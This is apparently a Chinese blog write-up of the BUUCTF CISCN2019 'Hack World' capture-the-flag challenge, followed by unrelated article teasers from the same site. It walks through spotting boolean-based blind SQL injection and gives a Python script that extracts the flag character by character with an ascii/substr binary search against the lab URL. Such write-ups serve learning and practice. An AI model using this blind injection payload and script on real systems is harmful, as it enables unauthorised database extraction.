当前位置：首页 > news >正文

107，【7】buuctf web [CISCN2019 华北赛区 Day2 Web1]Hack World

news 2025/7/7 16:13:06

这次先不进入靶场

看到红框里面的话就想先看看uuid是啥

定义与概念

UUID 是 Universally Unique Identifier 的缩写，即通用唯一识别码。它是一种由数字和字母组成的 128 位标识符，在理论上可以保证在全球范围内的唯一性。UUID 的设计目的是让分布式系统中的所有元素都能有唯一的辨识信息，而不需要通过中央控制端来指定唯一标识符。

格式

UUID 的标准格式是 32 个十六进制数字，被连字符分隔成 5 个部分，形式为 xxxxxxxx-xxxx-Mxxx-Nxxx-xxxxxxxxxxxx，其中：

xxxxxxxx 表示 8 位十六进制数字。
M 表示 UUID 的版本号，目前有 1 - 5 共 5 个版本。
N 表示 UUID 的变体（Variant），常见的有 1、2、4 等。

例如：550e8400-e29b-41d4-a716-446655440000

进入靶场

害怕你看不懂，给你翻译一下

感觉很像sql注入

尝试1'

一看到bool（false）就想到之前做过的一道题，这种布尔类型用脚本会方便很多，人为一个个输太麻烦

54，【4】BUUCTF WEB GYCTF2020Ezsqli-CSDN博客

select(flag)from(flag)：从 flag 表中选择 flag 字段的值。
substr(..., {i}, 1)：从 flag 字段的值中提取第 i 个字符。
ascii(...)：获取该字符的 ASCII 码。
ascii(...) > {mid}：判断该字符的 ASCII 码是否大于 mid。

import requests
import timeurl = "http://bc228b3d-090b-4f59-b55a-31f11d9c40ce.node5.buuoj.cn:81/"
payload = {"id": ""
}
flag = ""for i in range(1, 200):print(f"\n正在尝试获取第 {i} 个字符...")time.sleep(0.06)head = 33tail = 130mid = (head + tail) // 2while head < tail:payload["id"] = f"(ascii(substr((select(flag)from(flag)),{i},1))>{mid})"print(f"当前尝试的 payload: {payload}")try:res = requests.post(url, data=payload)res_text = res.textstatus_code = res.status_codeprint(f"请求状态码: {status_code}")if "Hello" in res_text:head = mid + 1print(f"响应中包含 'Hello'，更新左边界为 {head}")else:tail = midprint(f"响应中不包含 'Hello'，更新右边界为 {tail}")mid = (head + tail) // 2except requests.RequestException as e:print(f"请求发生错误: {e}")breakif chr(mid) == " ":print("遇到空格，停止获取字符。")breakflag += chr(mid)print(f"成功获取到第 {i} 个字符，当前已获取的 flag 为: {flag}")print(f"最终获取到的 flag: {flag}")

107，【7】buuctf web [CISCN2019 华北赛区 Day2 Web1]Hack World

这次先不进入靶场看到红框里面的话就想先看看uuid是啥定义与概念 UUID 是 Universally Unique Identifier 的缩写，即通用唯一识别码。它是一种由数字和字母组成的 128 位标识符，在理论上可以保证在全球范围内的唯一性。UUID 的设计目的是让分布式系…...

编程日记 2025/2/6 12:22:37

STM32 ADC单通道配置

硬件电路接线图： ADC基本结构图代码配置根据基本结构框图 1.定义结构体变量 //定义结构体变量 GPIO_InitTypeDef GPIO_InitStructure;//定义GPIO结构体变量 ADC_InitTypeDef ADC_InitStructure; //定义ADC结构体变量 2.开启RCC时钟 ADC、GPIO的时钟&#x…...

编程日记 2025/2/6 12:21:36

【技海登峰】Kafka漫谈系列（二）Kafka高可用副本的数据同步与选主机制

【技海登峰】Kafka漫谈系列（二）Kafka高可用副本的数据同步与选主机制一. 数据同步在之前的学习中有了副本Replica的概念，解决了数据备份的问题。我们还需要面临一个设计难题即：如何处理分区中Leader与Follwer节点数据同步不匹配问题所带来的风险，这也是保证数据高可用的…...

编程日记 2025/2/6 12:14:28

Spring的三级缓存如何解决循环依赖问题

循环依赖问题是在对象之间存在相互依赖关系，形成一个闭环，导致无法准确的完成对象的创建和初始化，当两个或多个对象彼此之间相互引用，这种相互引用形成一个循环时，就可能出现循环依赖问题。在 Spring 框架中&#xf…...

编程日记 2025/2/6 12:13:26

Ext文件系统

文件内容属性被打开的文件在内存中，没有被打开的文件在磁盘里文件系统的工作就是根据路径帮我们找到在磁盘上的文件磁盘（硬件） 磁盘的存储结构磁头在传动臂的运动下共同进退，向磁盘写入的时候是向柱面批量写入的 OS文件系统访…...

编程日记 2025/2/6 12:08:17

回溯算法---数独问题

回溯算法理论基础回溯和递归密不可分，有回溯就有递归，所谓回溯就是基于一个叉树，可能是二叉树或者是三叉树，从root节点开始深度优先搜索遍历节点，当遍历到一个子节点时，回溯到上一个根节点选择另外一个子…...

编程日记 2025/2/6 12:04:11

蓝桥杯python基础算法（2-1）——排序

目录一、排序二、例题 P3225——宝藏排序Ⅰ 三、各种排序比较四、例题 P3226——宝藏排序Ⅱ 一、排序 （一）冒泡排序基本思想：比较相邻的元素，如果顺序错误就把它们交换过来。 （二）选择排序基本思想…...

编程日记 2025/2/6 12:03:08

【课程笔记】信息隐藏与数字水印

文章总览：YuanDaiMa2048博客文章总览【课程笔记】信息隐藏与数字水印信号处理基础知识隐写系统隐写算法性能指标音频信号处理基础数字音频概念人类听觉系统与语音质量评价信息隐藏的原理数字指纹与版权保护盲水印与非盲水印私钥水印与公钥水印信息隐藏的研究层次信息隐藏与数…...

编程日记 2025/2/6 12:02:06

Page Assist实现deepseek离线部署的在线搜索功能

前面文章Mac 基于Ollama 本地部署DeepSeek离线模型实现了deepseek的离线部署，但是部署完成虽然可以进行问答和交互，也有thinking过程，但是没办法像官方一样进行联网搜索。今天我们介绍一款浏览器插件Page Assist来实现联网搜索，完…...

编程日记 2025/2/6 11:59:03

composeUI中Box 和 Surface的区别

在 Jetpack Compose 中，Box 和 Surface 都是常用的布局组件，但它们的用途和功能有所不同。 Box 组件： 功能：Box 是一个用于将子组件堆叠在一起的布局容器，类似于传统 Android 中的 FrameLayout。用途：适用…...

编程日记 2025/2/6 11:50:55

太久没更了，抽空学习下。看一道简单题。 class Solution:def maxProfit(self, prices: List[int]) -> int:cost -1profit 0for i in prices:if cost -1:cost icontinueprofit_ i - costif profit_ > profit:profit profit_if cost > i:cost iret…...

编程日记 2025/2/6 11:49:54

MySQL表的CURD

目录一、Create 1.1单行数据全列插入 1.2多行数据指定列插入 1.3插入否则更新 1.4替换 2.Retrieve 2.1 select列 2.1.1全列查询 2.1.2指定列查询 2.1.3查询字段为表达式 2.1.4为查询结果指定别名 2.1.5结果去重 2.2where条件 2.3结果排序 2.4筛选分页结果三…...

编程日记 2025/2/6 11:43:48

Java 如何覆盖第三方 jar 包中的类

目录一、需求描述二、示例描述三、操作步骤四、验证结果五、实现原理背景： 在我们日常的开发中，经常需要使用第三方的 jar 包，有时候我们会发现第三方的 jar 包中的某一个类有问题，或者我们需要定制化修改其中的逻辑&#xff0c…...

编程日记 2025/2/6 11:42:45

VSCode中使用EmmyLua插件对Unity的tolua断点调试

一.VSCode中搜索安装EmmyLua插件二.创建和编辑launch.json文件初始的launch.json是这样的手动编辑加上一段内容如下图所示： 三.启动调试模式，并选择附加的进程...

编程日记 2025/2/6 11:41:44

【数据结构】_链表经典算法OJ（力扣/牛客第二弹）

目录 1. 题目1：返回倒数第k个节点 1.1 题目链接及描述 1.2 解题思路 1.3 程序 2. 题目2：链表的回文结构 2.1 题目链接及描述 2.2 解题思路 2.3 程序 1. 题目1：返回倒数第k个节点 1.1 题目链接及描述题目链接： 面试题 …...

编程日记 2025/2/6 11:40:43

Spring Boot 2 快速教程：WebFlux优缺点及性能分析（四）

WebFlux优缺点【来源DeepSeek】 Spring WebFlux 是 Spring 框架提供的响应式编程模型，旨在支持非阻塞、异步和高并发的应用场景。其优缺点如下： 优点高并发与低资源消耗非阻塞 I/O：基于事件循环模型（如 Netty）&am…...

编程日记 2025/2/6 11:36:38

自定义多功能输入对话框：基于 Qt 打造灵活交互界面

一、引言在使用 Qt 进行应用程序开发时，我们经常需要与用户进行交互，获取他们输入的各种信息。QInputDialog 是 Qt 提供的一个便捷工具，可用于简单的输入场景，但当需求变得复杂，需要支持更多类型的输入控件&#xff0…...

编程日记 2025/2/6 11:31:33

基于springboot河南省旅游管理系统

基于Spring Boot的河南省旅游管理系统是一种专为河南省旅游行业设计的信息管理系统，旨在整合和管理河南省的旅游资源信息，为游客提供准确、全面的旅游攻略和服务。以下是对该系统的详细介绍： 一、系统背景与意义河南省作为中国的中部省份&…...

编程日记 2025/2/6 11:30:32

LabVIEW图像采集与应变场测量系统

开发了一种基于LabVIEW的图像采集与应变场测量系统，提供一种高精度、非接触式的测量技术，用于监测物体的全场位移和应变。系统整合了实时监控、数据记录和自动对焦等功能，适用于工程应用和科学研究。项目背景传统的位移和应变测量技术往往…...

编程日记 2025/2/6 11:29:31

CommonAPI学习笔记-2

一. 概述这篇文章主要是想整理并且分析CommonAPI代码生成工具根据fidl和fdepl配置文件生成出来的代码的结构和作用。二. fidl 用户根据业务需求在fidl文件中定义业务服务接口的结构以及自定义数据类型，然后使用core生成工具传入fidl文件生成该fidl的核心…...

编程日记 2025/2/6 11:27:26

浏览器访问 AWS ECS 上部署的 Docker 容器（监听 80 端口）

✅ 一、ECS 服务配置 Dockerfile 确保监听 80 端口 EXPOSE 80 CMD ["nginx", "-g", "daemon off;"]或 EXPOSE 80 CMD ["python3", "-m", "http.server", "80"]任务定义（Task Definition&…...

编程新知 2025/7/7 1:45:57

中南大学无人机智能体的全面评估！BEDI：用于评估无人机上具身智能体的综合性基准测试

作者：Mingning Guo, Mengwei Wu, Jiarun He, Shaoxian Li, Haifeng Li, Chao Tao单位：中南大学地球科学与信息物理学院论文标题：BEDI: A Comprehensive Benchmark for Evaluating Embodied Agents on UAVs论文链接：https://arxiv.…...

编程新知 2025/7/7 12:21:55